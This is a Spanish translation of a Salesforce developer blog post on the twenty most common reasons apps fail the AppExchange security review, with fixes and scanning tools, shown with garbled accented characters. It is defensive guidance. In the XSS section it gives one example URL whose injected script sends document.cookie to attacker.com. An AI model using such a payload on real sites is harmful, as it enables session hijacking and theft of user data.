Skip to content

Tag: Validar

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Las 20 vulnerabilidades principales encontradas en la revisi贸n de seguridad de AppExchange 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Las 20 principales vulnerabilidades encontradas en la revisi贸n de seguridad de AppExchange | Blog de desarrolladores de Salesforce

Se sabe que la revisi贸n de seguridad de AppExchange es uno de los procesos de revisi贸n m谩s rigurosos de cualquier mercado de aplicaciones en l铆nea. Esta estricta reputaci贸n es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor n煤mero uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los m谩s altos est谩ndares de seguridad posibles para la protecci贸n de los datos de los clientes.

Dicho esto, estos est谩ndares pueden representar un desaf铆o importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener 茅xito, en orden de prevalencia, esta publicaci贸n analizar谩 las 20 razones principales por las que los socios no pasan la revisi贸n de seguridad (a partir de 2023). Tambi茅n cubriremos c贸mo remediar o prevenir estos problemas.

#1 鈥 Aplicaci贸n de CRUD/FLS

驴Qu茅 es esto?

Las vulnerabilidades de aplicaci贸n de la seguridad a nivel de objetos y campos (CRUD/FLS) son la raz贸n principal (por un margen significativo) para no pasar la revisi贸n de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene alg煤n c贸digo de Salesforce, este problema debe ser su prioridad n煤mero uno a resolver antes de enviarlo para una revisi贸n de seguridad.

驴C贸mo puedo abordar esto?

Si, durante su proceso de codificaci贸n, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querr谩 hacer una revisi贸n muy exhaustiva de su c贸digo base para asegurarse de que no est茅 realizar cualquier operaci贸n de creaci贸n/lectura/actualizaci贸n/eliminaci贸n no marcada en objetos o campos.

El m茅todo preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer a煤n no lo admiten completamente (al momento de escribir esta publicaci贸n, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protecci贸n arrojar谩 falsos positivos). Code Analyzer Graph Engine es actualmente la 煤nica herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentaci贸n para ejecutar un escaneo con Code Analyzer Graph Engine.

Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, m茅todos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensi贸n PMD para VS Code pueden ser 煤tiles herramientas que puede utilizar para comprobar su c贸digo base. Puede seguir nuestra gu铆a para obtener m谩s informaci贸n sobre c贸mo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.

El esc谩ner Checkmarx debe utilizarse como verificaci贸n final de violaciones de CRUD/FLS. Puede ejecutar este an谩lisis a trav茅s del Portal de seguridad para socios .

Obtenga m谩s informaci贸n sobre la aplicaci贸n de CRUD/FLS en Trailhead .

#2 鈥 Versi贸n de software insegura

驴Qu茅 es esto?

Esto significa que alguna pieza de software (normalmente, una versi贸n espec铆fica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayor铆a de las veces, es porque est谩s usando una versi贸n desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la m谩s com煤n), pero tambi茅n podr铆a ser algo as铆 como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.

驴C贸mo puedo abordar esto?

Intente identificar todas las bibliotecas, marcos, software y otras tecnolog铆as que no sean de Salesforce dentro del alcance de su oferta de AppExchange.

Busque cada uno de estos en Snyk (para proyectos de c贸digo abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas p煤blicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. Tambi茅n puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su c贸digo base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.

Nota: En algunos casos, puede agregar documentaci贸n de falsos positivos para argumentar que un CVE particular registrado no podr铆a aplicarse a su oferta, ya que quiz谩s no est茅 utilizando la funcionalidad asociada con ese CVE.

#3 鈥 Violaci贸n al compartir

驴Qu茅 es esto?

B谩sicamente, esto significa que tiene clases de Apex en las que no ha agregado expl铆citamente la palabra clave with sharing al encabezado de la clase, omitiendo as铆 las reglas de uso compartido de una organizaci贸n.

驴C贸mo puedo abordar esto?

Simplemente verifique todas sus clases de Apex y aseg煤rese de tener with sharing (o el uso compartido heredado) definido en el encabezado de la clase. Para los casos en los que necesita que una clase se ejecute sin compartir (por ejemplo, la clase debe ejecutarse en un contexto de sistema y no en un contexto de usuario), agregue una explicaci贸n a su documento de falso positivo que explique el caso de uso empresarial (e idealmente, agregue comentarios en la parte superior). de los encabezados de clase relevantes para que quede a煤n m谩s claro).

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Obtenga m谩s informaci贸n sobre c贸mo compartir el cumplimiento a trav茅s de Trailhead .

#4: Almacenamiento inseguro de datos confidenciales

驴Qu茅 es esto?

Los secretos no deben estar codificados en el c贸digo fuente. Aunque el c贸digo puede estar contenido en un paquete administrado donde el c贸digo est谩 oculto para los clientes, todav铆a existen razones por las que esta es una pr谩ctica insegura, entre ellas:

  • El cliente debe tener control sobre sus secretos y claves y, en muchos casos, debe poder cambiarlos o actualizarlos.
  • Los secretos pueden quedar expuestos en registros o mensajes de error
  • Si un secreto o clave caduca, el cliente no podr谩 actualizarlo por s铆 mismo.

驴C贸mo puedo abordar esto?

Aseg煤rese de que no haya secretos codificados en el c贸digo fuente, incluso si es un paquete administrado. Aseg煤rese de que todos los secretos se almacenen de una de las siguientes maneras:

  • Campos de metadatos personalizados protegidos (para secretos propiedad de socios)
  • Configuraciones personalizadas protegidas (para secretos propiedad del suscriptor/cliente)
  • Credenciales con nombre (esto generalmente no se recomienda, pero si tiene un caso de uso espec铆fico que lo requiera, es posible que se permita caso por caso)
  • Cifrado y almacenado en objetos personalizados con la clave de cifrado almacenada en una configuraci贸n personalizada protegida o en un campo de metadatos personalizados ocultos

Obtenga m谩s informaci贸n sobre el almacenamiento seguro de secretos en Trailhead .

#5 鈥 Configuraci贸n TLS/SSL

驴Qu茅 es esto?

Todas las conexiones entrantes y salientes que involucran a sus comunidades, sitios y portales de Salesforce deben utilizar Transport Layer Security (TLS) 1.2. Este requisito es v谩lido en los modos Lightning Experience y Salesforce Classic para comunidades y sitios, independientemente de si est谩n en las ediciones Essentials, Enterprise, Performance, Unlimited o Developer.

驴C贸mo puedo abordar esto?

Verifique que el acceso a su navegador, las integraciones de API y otras funciones de Salesforce sean compatibles con TLS 1.2.

Una forma sencilla de hacerlo es utilizar Qualys SSL Scanner. El equipo de revisi贸n de seguridad ejecutar谩 este an谩lisis en todos y cada uno de los puntos finales externos o que no sean de Salesforce involucrados en su soluci贸n. Si sus terminales no reciben una calificaci贸n A por cumplimiento de SSL/TLS, su revisi贸n de seguridad no ser谩 aprobada.

Para ejecutar el escaneo, simplemente ingrese la URL base en el formulario web de prueba del servidor SSL de Qualys y presione Enviar.

Puede encontrar m谩s detalles sobre los requisitos de TLS en las notas de la versi贸n .

#6 鈥 Informaci贸n confidencial en depuraci贸n

驴Qu茅 es esto?

Este tipo de vulnerabilidad describe situaciones en las que se filtra informaci贸n confidencial, como secretos de aplicaciones, datos del sistema o informaci贸n de depuraci贸n demasiado detallada, a trav茅s de funciones de registro u otros flujos de salida. Por lo general, esto sucede cuando el registro detallado est谩 habilitado para fines de desarrollo, pero luego no se reduce adecuadamente antes de enviarlo para la revisi贸n de seguridad de AppExchange.

驴C贸mo puedo abordar esto?

En su paquete de Salesforce, aseg煤rese de buscar en su c贸digo fuente todas las declaraciones de depuraci贸n del paquete para asegurarse de que no registren informaci贸n confidencial o secretos.

Aseg煤rese de que los c贸digos de error y los mensajes de error en toda su soluci贸n tengan un nivel de informaci贸n apropiado para que todos los usuarios los vean. Por ejemplo, los usuarios habituales generalmente no deber铆an ver seguimientos de pila completos ni informaci贸n de depuraci贸n detallada. De manera similar, aseg煤rese de que otras funciones de registro o flujos de salida tampoco filtren datos confidenciales.

Code Analyzer y PMD para VS Code pueden ayudarlo a detectar estos problemas en las aplicaciones de Salesforce, y los esc谩neres de aplicaciones web como Burp Suite , Chimera u OWASP ZAP tambi茅n pueden ayudarlo a detectar estos problemas en sus integraciones externas y aplicaciones web.

Obtenga m谩s informaci贸n sobre c贸mo verificar los seguimientos de la pila e informaci贸n detallada sobre las excepciones en el n煤mero 13.

#7 – CSRF

驴Qu茅 es esto?

La falsificaci贸n de solicitudes entre sitios (CSRF) es un tipo de ataque que enga帽a a una v铆ctima para que ejecute acciones no deseadas en una aplicaci贸n web en la que est谩 autenticada. Explotar la confianza que un sitio tiene en el navegador del usuario puede llevar a acciones potencialmente da帽inas, como cambiar direcciones de correo electr贸nico y contrase帽as, o incluso realizar transacciones sin el conocimiento o consentimiento del usuario.

En la plataforma Salesforce, existe un token anti-CSRF para contrarrestar dichos ataques, que ofrece protecci贸n mientras se utilizan controladores y m茅todos est谩ndar. Sin embargo, los desarrolladores pueden eludir involuntariamente estas salvaguardas anti-CSRF al crear sus propios m茅todos de acci贸n.

驴C贸mo puedo abordar esto?

En general, las aplicaciones web pueden prevenir ataques CSRF principalmente implementando tokens anti-CSRF, que son valores 煤nicos y espec铆ficos del usuario incluidos en cada solicitud de cambio de estado para verificar la fuente. Adem谩s, deben adoptar la pr谩ctica de cookies del mismo sitio, que impide que el navegador env铆e la cookie junto con solicitudes entre sitios, mitigando as铆 los riesgos de CSRF.

Para p谩ginas de Visualforce:

  • Al crear p谩ginas de Visualforce, evite utilizar solicitudes HTTP GET que cambien de estado; use POST o PUT para cambios de estado en su lugar
  • No ejecute acciones autom谩ticas ni cambie el estado (por ejemplo, operaciones DML) al cargar la p谩gina.
  • Otra t茅cnica de mitigaci贸n implica agregar una p谩gina de confirmaci贸n intermedia antes de realizar la acci贸n, donde el usuario puede confirmar que ten铆a la intenci贸n de realizar esa acci贸n.

Para componentes Lightning:

  • De manera similar a las p谩ginas de Visualforce, evite cambiar el estado o ejecutar acciones al cargar un componente Lightning, mediante enlaces como init (para Aura) ,connectedCallback , renderedCallback o constructor .

Al realizar llamadas API:

  • Para las API que no son de Salesforce, es posible que tambi茅n desee agregar su propio token CSRF.

CSRF es uno de los tipos de problemas de seguridad m谩s complicados, por lo que vale la pena invertir en aprender m谩s sobre 茅l en profundidad. Para los paquetes de Salesforce, existe excelente documentaci贸n para desarrolladores y un m贸dulo Trailhead como referencia.

Para otros tipos de aplicaciones web, es posible que desees consultar la documentaci贸n de OWASP .

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas en sus aplicaciones web externas.

N.潞 8: secuencias de comandos entre sitios (XSS) almacenadas y reflejadas

驴Qu茅 es esto?

Los ataques de secuencias de comandos entre sitios (XSS) son problemas de inyecci贸n en los que se insertan secuencias de comandos da帽inas en sitios web confiables. Ocurren cuando un atacante explota una aplicaci贸n web para enviar c贸digo malicioso, a menudo un script del lado del cliente, a un usuario diferente. Estos ataques explotan fallas en aplicaciones web que utilizan entradas de usuario no validadas o codificadas en su salida.

En un ataque XSS, el navegador de un usuario desprevenido ejecuta el script malicioso, creyendo que proviene de una fuente confiable. Esto permite que el script acceda a cookies, tokens de sesi贸n u otros datos confidenciales almacenados en el navegador. Incluso puede modificar el contenido HTML de la p谩gina.

Los ataques XSS almacenados son de tipo persistente, en los que la aplicaci贸n web almacena la entrada maliciosa y luego se muestra a los usuarios. Los ataques XSS reflejados, por otro lado, generalmente ocurren cuando se inyecta c贸digo malicioso en una URL, que se ejecuta cuando un usuario hace clic en ella (por ejemplo: http://example.com/search?query=<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script> ).

Los motivos por los que su aplicaci贸n podr铆a ser susceptible incluyen:

  • Entrada no validada : las aplicaciones pueden aceptar entradas del usuario y usarlas o mostrarlas en una p谩gina sin validarlas adecuadamente (para garantizar que no contenga c贸digo/scripts ejecutables).
  • Campos de texto enriquecido : almacenar entradas en campos RTF de Salesforce es riesgoso porque admiten contenido HTML, por lo que debe validar la entrada para evitar que se almacenen XSS.
  • P谩ginas de Visualforce : pueden ser susceptibles si utilizan entradas generadas por el usuario en el cuerpo HTML o en JavaScript sin un escape de entrada o codificaci贸n de salida adecuados.
  • Componentes web Aura y Lightning (LWC) : aunque tienen protecciones integradas contra XSS, los desarrolladores pueden evitar estas protecciones mediante cosas como el uso de la propiedad innerHTML , lwc:dom=鈥漨anual鈥 o el componente lightning:formattedRichText sin la validaci贸n de entrada adecuada.
  • Par谩metros de URL : las aplicaciones pueden usarlos directamente en el HTML o JavaScript de una p谩gina sin validaci贸n (lo que lleva a XSS reflejado).

驴C贸mo puedo abordar esto?

Su objetivo principal debe ser evitar la manipulaci贸n de DOM, pero tambi茅n recomendamos practicar el filtrado de entrada y la codificaci贸n de salida, que incluyen:

  • Evite la manipulaci贸n del modelo de objetos de documento (DOM): en su lugar, utilice t茅cnicas como directivas de plantilla y evite funciones de JavaScript potencialmente inseguras (por ejemplo, eval() , DOMParser.parseFromString() , Document.implementation.createHTMLDocument() , setTimeout() , setInterval() )
  • Filtrado de entrada: aseg煤rese de que la entrada del usuario no contenga c贸digo ejecutable mediante el uso de expresiones regulares y listas de bloqueo o listas de permitidos (por ejemplo, filtre los caracteres com煤nmente utilizados en el c贸digo, como '<', '>', comillas simples o dobles, ' /', ';', corchetes, par茅ntesis u operadores matem谩ticos o l贸gicos como '+', '&' o '-')
  • Codificaci贸n de salida : aseg煤rese de que si el c贸digo ejecutable pasara el filtrado de entrada, no se interprete como c贸digo al convertir caracteres "peligrosos" en versiones de texto inofensivas (por ejemplo, '&; debe convertirse a &amp; y '<' o '>' debe convertirse a &lt; y &gt;)

Este m贸dulo de Trailhead explica exactamente c贸mo mitigar XSS con estas t茅cnicas, y nuestra documentaci贸n para desarrolladores tambi茅n es 煤til aqu铆. Para obtener consejos espec铆ficos sobre la protecci贸n contra XSS en componentes Lightning, consulte la p谩gina Seguridad Lightning en la Gu铆a de codificaci贸n segura.

Para aplicaciones web que no son de Salesforce, tambi茅n puede consultar la documentaci贸n de OWASP para obtener consejos adicionales.

Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

#9: JavaScript no est谩 en recursos est谩ticos

驴Qu茅 es esto?

Muchos paquetes administrados por Salesforce no pasan la revisi贸n de seguridad por no almacenar JavaScript como recursos est谩ticos en sus paquetes y, en su lugar, se vinculan a archivos JavaScript alojados externamente con etiquetas <script> . La raz贸n principal de esta regla es que permite un control de versiones mucho m谩s seguro y garantiza la integridad de los archivos JavaScript en su paquete de Salesforce incluso si la fuente externa est谩 comprometida.

驴C贸mo puedo abordar esto?

Nuestra regla es que todos los recursos de script y estilo deben agregarse al paquete como recursos est谩ticos y luego cargarse con una etiqueta <apex:includeScript> en su p谩gina (para Visualforce) o un ltng:require en su .cmp o .app. marcado (para Aura).

Nota: Si tiene un LWC, defina los m贸dulos JavaScript que importe a su componente o use la funci贸n loadScript para cargar un archivo JavaScript de recursos est谩ticos.

Para paquetes que no son LWC, la mejor manera de verificar este problema es buscar manualmente su c贸digo fuente para asegurarse de que todas las bibliotecas de JavaScript est茅n almacenadas como recursos est谩ticos, no cargadas din谩micamente a trav茅s de hiperv铆nculos.

Para situaciones en las que esto no sea factible, recomendamos programar una cita en horario de oficina t茅cnica para analizar su caso de uso. Es posible obtener una excepci贸n en ciertos casos.

Obtenga m谩s informaci贸n sobre este problema en nuestra documentaci贸n para desarrolladores .

#10 鈥 Inyecci贸n SOQL

驴Qu茅 es esto?

La inyecci贸n SOQL es la versi贸n espec铆fica de Salesforce de la inyecci贸n SQL. Ocurre cuando una entrada no validada proporcionada por el usuario se inserta directamente en una consulta SOQL din谩mica. Si la entrada no est谩 validada, puede incluir comandos SOQL que modifican efectivamente la declaraci贸n SOQL y enga帽an a la aplicaci贸n para que ejecute comandos no deseados.

驴C贸mo puedo abordar esto?

La forma m谩s sencilla de evitar el problema es evitar consultas din谩micas en favor de consultas est谩ticas y utilizar variables vinculantes. De lo contrario, deber谩 validar estrictamente las entradas del usuario antes de usarlas en consultas mediante t茅cnicas como encasillamiento, lista blanca de entradas o escape.

Code Analyzer , PMD para VS Code y Checkmarx tambi茅n pueden ayudarlo a escanear su c贸digo.

Para obtener m谩s informaci贸n, consulte nuestro m贸dulo Trailhead o revise nuestra documentaci贸n para desarrolladores .

Para aplicaciones que no son de Salesforce, es posible que desee obtener m谩s informaci贸n sobre la inyecci贸n SQL en la gu铆a OWASP . Los esc谩neres de aplicaciones web, como Burp Suite , Chimera u OWASP ZAP , tambi茅n pueden ayudar a identificar problemas de inyecci贸n SQL.

#11 鈥 Lightning: carga CSS inadecuada

驴Qu茅 es esto?

Similar al problema de usar etiquetas <script> o <link> para cargar JavaScript en sus paquetes, usar etiquetas <link> o <style> para cargar CSS en lugar de <apex:stylesheet> (Visualforce) o <ltng:require> ( Aura) se considera una pr谩ctica insegura. Estas etiquetas <link> y <style> pueden hacer referencia a recursos externos o en l铆nea que contienen CSS o JavaScript, y la arquitectura de seguridad Lightning Web Security (LWS) de Salesforce no los controla ni los desinfecta.

Para los componentes de Aura, en particular, el uso de <ltng:require> tambi茅n permite a Salesforce aplicar correctamente las reglas de seguridad LWS y garantizar que el CSS que est谩 cargando est茅 correctamente aislado y no incluya c贸digo o estilos JavaScript no seguros que puedan afectar negativamente a otros. partes de su aplicaci贸n Salesforce.

驴C贸mo puedo abordar esto?

Para hacer referencia a un recurso CSS externo que haya subido como recurso est谩tico, use una etiqueta <apex:stylesheet> en su p谩gina (para Visualforce) o una etiqueta <ltng:require> en su marcado .cmp o .app (para Aura ). Busque el c贸digo fuente de su paquete para asegurarse de que no haya utilizado etiquetas <link> o <style> en ning煤n lugar para cargar recursos CSS.

Nota: Si tiene una LWC, no puede encontrarse con este problema de todos modos porque, al igual que las etiquetas <script> , las etiquetas <style> ya est谩n bloqueadas para su uso dentro de las plantillas HTML. En su lugar, incluir铆a su CSS en el archivo CSS asociado de su componente o usar铆a la funci贸n loadStyle para cargar un archivo CSS de recursos est谩ticos.

Puede encontrar m谩s informaci贸n en nuestra documentaci贸n para desarrolladores .

#12: JavaScript en Salesforce DOM (solo experiencia cl谩sica)

驴Qu茅 es esto?

Salesforce tiene reglas estrictas sobre el uso de JavaScript y una de esas reglas es que JavaScript no se puede ejecutar directamente dentro del contexto de la aplicaci贸n Salesforce. Esto significa que no puede incluir bloques de JavaScript directamente dentro de los componentes que se ejecutan en Salesforce DOM, como HomePageComponents, WebLinks, Custom Buttons, etc.

En cambio, todo JavaScript debe residir bajo el dominio de espacio de nombres de su aplicaci贸n en las p谩ginas de Visualforce que usted controla, de modo que el JavaScript personalizado est茅 esencialmente aislado del DOM principal de Salesforce. Eso significa que no puede usar JavaScript para crear botones personalizados, pesta帽as web, componentes de p谩gina de inicio y elementos similares (por ejemplo, incluir controladores de eventos de JavaScript onclick en botones personalizados podr铆a ser motivo de falla).

驴C贸mo puedo abordar esto?

Esto es algo que deber谩 verificar manualmente en el c贸digo fuente de su paquete Salesforce. Verifique y aseg煤rese de que no haya utilizado JavaScript para crear botones personalizados, pesta帽as web, componentes de la p谩gina de inicio u otros elementos similares, y verifique que cualquier JavaScript personalizado est茅 incluido solo en el dominio de su aplicaci贸n con espacio de nombres en las p谩ginas de VisualForce que controla como parte de su aplicaci贸n.

Una forma de verificar esto es buscar el texto <openType>onClickJavaScript</openType> en los archivos de metadatos de la aplicaci贸n (a menudo en archivos XML como weblink/something.weblink) y, si lo encuentra, aseg煤rese de eliminarlo. Incluso si su aplicaci贸n solo est谩 destinada a usarse en Lightning Experience, si la vulnerabilidad est谩 presente para los usuarios en modo Cl谩sico, el paquete no se puede aprobar.

Esta regla en particular no est谩 especialmente bien documentada, pero puede leer m谩s en el documento Lista de verificaci贸n de revisi贸n de seguridad de AppExchange (se requiere iniciar sesi贸n en la comunidad de socios).

#13 鈥 Divulgaci贸n de informaci贸n en p谩ginas de error y excepciones

驴Qu茅 es esto?

En el contexto de la revisi贸n de seguridad de AppExchange, este t茅rmino se refiere espec铆ficamente a situaciones (generalmente en aplicaciones o servicios web que no son de Salesforce o fuera de plataforma) donde sus p谩ginas de error muestran datos confidenciales del sistema o informaci贸n de depuraci贸n. Por ejemplo, a veces las p谩ginas de error incluyen seguimientos de pila completos que muestran c贸mo se hace referencia internamente a los objetos o rutas de archivo relativas al lugar donde est谩 instalada la aplicaci贸n. A veces, incluso la informaci贸n confidencial queda expuesta de esta manera.

驴C贸mo puedo abordar esto?

Busque en su base de c贸digo llamadas que causen excepciones o que los seguimientos de pila se representen en cadenas o flujos de salida, y realice pruebas que puedan causar errores, como entradas no v谩lidas, entradas vac铆as, entradas demasiado largas, acceso a p谩ginas internas sin autenticaci贸n, omisi贸n de aplicaciones. flujo, etc

La herramienta de fuzzing de Burp Suite puede ser una gran ayuda en este caso.

Tambi茅n puede obtener excelentes consejos para realizar pruebas de seguimiento de pila a trav茅s de esta gu铆a de OWASP .

#14 鈥 Componentes de Aura: componente externo de CSS

驴Qu茅 es esto?

Se supone que los componentes de Aura son peque帽os, aut贸nomos, reutilizables y reposicionables. CSS que evita la encapsulaci贸n de componentes (a trav茅s de .THIS) o que utiliza un posicionamiento no est谩ndar (por ejemplo, flotante o posici贸n: absoluta o fija) infringe estas garant铆as y puede interferir con la visualizaci贸n de otros componentes. En particular, el uso del posicionamiento absoluto en CSS es la raz贸n principal de este tipo de falla.

Si bien esto puede no parecer un problema de seguridad a primera vista, puede alterar el dise帽o del sitio web de Salesforce y viola el esp铆ritu del modelo de seguridad de Lightning, donde los componentes est谩n estrictamente aislados y se garantiza que permanecer谩n en su propio carril.

驴C贸mo puedo abordar esto?

Este es otro problema que debes verificar manualmente. B谩sicamente, busque en el CSS de su componente Aura, especialmente para posicionamiento absoluto/fijo o ancho y alto fijos. Tambi茅n recomendamos revisar nuestra documentaci贸n para asegurarse de que est谩 siguiendo todas las reglas CSS correctas.

#15 鈥 Canal de mensajes expuesto

驴Qu茅 es esto?

Este t茅rmino se refiere espec铆ficamente a los casos en los que no ha configurado el indicador isExposed en Lightning Message Channel en falso. Dado que esto proporciona acceso a la API del Servicio de mensajes Lightning (LMS), que le permite publicar y suscribirse a mensajes en todo el DOM y entre Aura, Visualforce y Lightning Web Components, debe establecerse en falso a menos que sea realmente necesario.

驴C贸mo puedo abordar esto?

Tiene dos opciones, seg煤n su caso de uso, que incluyen:

  1. Registre un ticket de soporte para solicitar que se habilite la eliminaci贸n de componentes administrados para su paquete u organizaci贸n de Dev Hub y elimine el componente del paquete. Si no puede hacerlo (por ejemplo, si esto afectar铆a la funcionalidad de los suscriptores que dependen de canales de mensajes expuestos), puede dejar el componente en el paquete y simplemente no usarlo (aseg煤rese de mencionar esto espec铆ficamente en un mensaje falso). documento positivo sobre su presentaci贸n).
  2. Si tiene que utilizar un componente de canal LMS, aseg煤rese de tener isExposed=false . Esto debe hacerse creando un nuevo componente de canal LMS porque los componentes existentes con isExposed=true no pueden cambiar isExposed=false . Utilice 煤nicamente el componente reci茅n creado en el c贸digo.

M谩s informaci贸n est谩 disponible en la documentaci贸n .

#16 鈥 Informaci贸n confidencial en URL

驴Qu茅 es esto?

Esto se refiere a una situaci贸n en la que se env铆a informaci贸n confidencial de larga duraci贸n en URL (por ejemplo, un ID o secreto de cliente, o un nombre de usuario/contrase帽a). En realidad, esto puede llevar a que se filtren secretos a largo plazo de varias maneras posibles. Por ejemplo:

  • Las URL completas a menudo se almacenan en servidores en registros de texto sin cifrar que pueden no almacenarse de forma segura y pueden ser vistos por el personal o comprometidos por un tercero.
  • Los motores de b煤squeda indexan URL y almacenan inadvertidamente informaci贸n confidencial
  • Almacenamiento de rutas URL completas en el historial del navegador local, cach茅 del navegador, marcadores y marcadores sincronizados entre dispositivos
  • Informaci贸n de URL enviada a aplicaciones web de terceros a trav茅s del encabezado de referencia o expuesta a scripts de terceros en la p谩gina

驴C贸mo puedo abordar esto?

Burp Suite puede ayudarle aqu铆 para aplicaciones web que no sean de Salesforce o fuera de plataforma, pero en general recomendamos comprobar manualmente su aplicaci贸n para detectar cualquier caso en el que se env铆en secretos a largo plazo a trav茅s de URL. Dependiendo de su caso de uso, es posible que deba realizar cambios, como usar solicitudes POST en lugar de solicitudes GET, cambiar su m茅todo de autenticaci贸n (OAuth 2.0 es generalmente ideal) y emplear cifrado y mejores m茅todos de almacenamiento de secretos.

La gu铆a OWASP es un gran recurso a seguir.

#17 鈥 Punto final inseguro

驴Qu茅 es esto?

El nombre de esta vulnerabilidad simplemente se refiere a situaciones en las que se utiliza HTTP en lugar de HTTPS.

驴C贸mo puedo abordar esto?

Las herramientas de escaneo pueden ser de ayuda, pero una forma a煤n m谩s segura de verificar esto es buscar en el c贸digo fuente enlaces HTTP y cambiarlos a HTTPS. Puede aprender un poco m谩s sobre c贸mo esto mejora la seguridad en esta p谩gina de OWASP .

#18 鈥 Enumeraci贸n de nombre de usuario o correo electr贸nico

驴Qu茅 es esto?

Por lo general, este problema solo surge en aplicaciones web externas fuera de la plataforma Salesforce. Se refiere a una situaci贸n en la que los atacantes pueden enumerar listas de nombres de usuario o correos electr贸nicos de su base de usuarios, generalmente analizando cambios en mensajes de error en funciones de inicio de sesi贸n, funciones de olvido de contrase帽a o registros de cuentas. Los atacantes suelen hacer esto para poder comprobar si hay contrase帽as reutilizadas de bases de datos comprometidas y fugas o volcados de contrase帽as.

驴C贸mo puedo abordar esto?

Verifique sus mensajes de error para registros de cuentas, recuperaci贸n de contrase帽as, intentos de inicio de sesi贸n, etc., y aseg煤rese de que su mensaje de error sea el mismo independientemente de si el nombre de usuario o el correo electr贸nico ingresado es v谩lido.

Por ejemplo, muchos sitios incluyen un mensaje gen茅rico, como: "Si dicho usuario existe, recibir谩 un correo electr贸nico con un restablecimiento de contrase帽a". Este tipo de mensaje general evita confirmar la existencia de un nombre de usuario o correo electr贸nico.

Por supuesto, en determinadas situaciones, puede ser inevitable (por ejemplo, durante el registro de una cuenta, es posible que deba confirmar que se ha utilizado un nombre de usuario). En esas situaciones, intente implementar controles que impidan la enumeraci贸n por fuerza bruta, como captchas para evitar que los robots eliminen su formulario de registro.

Burp Suite es una excelente herramienta para verificar esto, pero si no la tiene, tambi茅n puede revisar sus funcionalidades de inicio de sesi贸n manualmente.

OWASP tiene una gu铆a 煤til para evitar la enumeraci贸n de correos electr贸nicos y nombres de usuarios.

#19 鈥 Gesti贸n de contrase帽as

驴Qu茅 es esto?

En ocasiones, el equipo de seguridad falla en sitios y aplicaciones web externos (que no sean Salesforce) por tener pol铆ticas de contrase帽as problem谩ticas, como por ejemplo:

  • Permitir la reutilizaci贸n de la misma contrase帽a cuando es necesario restablecerla
  • No solicitar la contrase帽a anterior cuando se permite a los usuarios establecer una nueva contrase帽a
  • Para restablecer la contrase帽a, enviar una contrase帽a temporal al correo electr贸nico de un usuario en texto sin formato
  • Dejar contrase帽as predeterminadas en los usuarios ra铆z del servidor o de la base de datos

驴C贸mo puedo abordar esto?

Adem谩s de evitar las situaciones anteriores, consulte la Hoja de referencia de autenticaci贸n de OWASP para obtener algunas pautas sobre c贸mo establecer pol铆ticas de contrase帽as seguras:

Burp Suite tambi茅n es muy 煤til para identificar problemas relacionados con las contrase帽as (por ejemplo, puede usarlo para intentar forzar sus p谩ginas de inicio de sesi贸n).

#20 鈥 Eco de contrase帽a

驴Qu茅 es esto?

Esto es un poco diferente del problema de administraci贸n de contrase帽as descrito anteriormente. Un eco de contrase帽a se refiere a situaciones en las que las contrase帽as se reflejan en texto sin formato en la interfaz de usuario (como cuando el usuario visita su propia p谩gina de configuraci贸n) o en llamadas API/respuestas JSON.

驴C贸mo puedo abordar esto?

Aseg煤rese de que su contrase帽a no se revele ni se transmita en texto sin formato en ninguna parte de su aplicaci贸n. Aseg煤rese de que en las p谩ginas de configuraci贸n u otras p谩ginas que muestran secretos, se muestren solo como asteriscos (se pueden mostrar al hacer clic en el bot贸n si es necesario).

Consulte la hoja de referencia sobre almacenamiento de contrase帽as de OWASP para obtener m谩s informaci贸n.

Burp Suite , o quiz谩s Chimera u OWASP ZAP , tambi茅n pueden ayudarle a detectar estos problemas.

Recursos adicionales

Si su soluci贸n incluye sitios web o aplicaciones web personalizados que no son de Salesforce, le recomendamos encarecidamente invertir en una licencia de Burp Suite si es financieramente viable para su organizaci贸n. Burp Suite es una de las mejores herramientas de seguridad del mercado y tambi茅n la utiliza mucho nuestro propio equipo de seguridad de productos. Chimera u OWASP ZAP son alternativas completamente gratuitas, pero prep谩rate para invertir m谩s tiempo en t茅rminos de revisi贸n manual, ya que carecen de muchas de las potentes funciones/herramientas que tiene Burp Suite.

Nota: Si su oferta se integra con aplicaciones o servicios web que no son de su propiedad, no intente escanear los puntos finales hasta que haya obtenido el permiso del propietario.

